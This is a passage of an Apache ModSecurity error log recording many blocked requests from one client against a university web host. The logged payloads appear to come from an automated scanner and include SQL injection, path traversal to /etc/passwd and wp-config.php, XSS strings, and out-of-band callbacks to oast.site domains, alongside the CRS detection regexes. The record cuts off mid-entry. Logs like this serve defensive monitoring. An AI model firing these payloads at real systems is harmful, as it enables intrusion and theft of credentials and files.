[Tue Aug 29 11:36:33.600814 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAUbg8EAAABQ"]
[Tue Aug 29 11:36:34.357704 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAT@KzIAAAA2"]
[Tue Aug 29 11:36:34.372777 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWx8x8AAAAg"]
[Tue Aug 29 11:36:36.938914 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWx8ykAAAAg"]
[Tue Aug 29 11:36:37.366441 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAUbg88AAABQ"]
[Tue Aug 29 11:36:37.416504 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWexj8AAAAP"]
[Tue Aug 29 11:36:38.404421 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWcCSUAAAAL"]
[Tue Aug 29 11:36:39.391897 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26geme7637k5hdx1.oast.site found within TX:1: cjmnbitjmimt14dgn26geme7637k5hdx1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAT9PUkAAAA1"]
[Tue Aug 29 11:36:41.361182 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWx80MAAAAg"]
[Tue Aug 29 11:36:41.477438 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWrxqkAAAAY"]
[Tue Aug 29 11:36:42.395718 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWnjjEAAAAT"]
[Tue Aug 29 11:36:45.406745 2023] [:error] [pid 1435] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAAWbE-sAAAAK"]
[Tue Aug 29 11:36:46.375030 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113sCo-f0AAAWuqzUAAAAZ"]
[Tue Aug 29 11:36:49.397642 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWPpaUAAAAH"]
[Tue Aug 29 11:36:56.572889 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWnjoQAAAAT"]
[Tue Aug 29 11:36:57.551976 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWnjowAAAAT"]
[Tue Aug 29 11:37:07.684965 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IQ8AAAAI"]
[Tue Aug 29 11:37:09.530283 2023] [:error] [pid 1435] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAWbFFcAAAAK"]
[Tue Aug 29 11:37:16.635768 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAW9IWsAAAAI"]
[Tue Aug 29 11:37:16.636813 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAUbhLIAAABQ"]
[Tue Aug 29 11:37:17.666960 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-cCo-f0AAAXCT-kAAAAG"]
[Tue Aug 29 11:37:27.466606 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAW1WmoAAAAD"]
[Tue Aug 29 11:37:35.438144 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAQSWjAAAAA0"]
[Tue Aug 29 11:37:37.513511 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXK59YAAAAY"]
[Tue Aug 29 11:37:45.372788 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWpXq4AAAAW"]
[Tue Aug 29 11:37:47.451456 2023] [:error] [pid 1492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXU5IYAAAAD"]
[Tue Aug 29 11:37:50.420272 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAARiDsQAAAAJ"]
[Tue Aug 29 11:37:52.436503 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXA9kkAAAAO"]
[Tue Aug 29 11:37:59.389161 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXXhewAAAAF"]
[Tue Aug 29 11:37:59.440473 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXWLHgAAAAD"]
[Tue Aug 29 11:38:10.635123 2023] [:error] [pid 1509] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXlRngAAAAV"]
[Tue Aug 29 11:38:23.364214 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAV1EYMAAAAd"]
[Tue Aug 29 11:38:33.363253 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAV1Ea8AAAAd"]
[Tue Aug 29 11:38:34.425020 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26gkgaymjc6t4tq9.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri 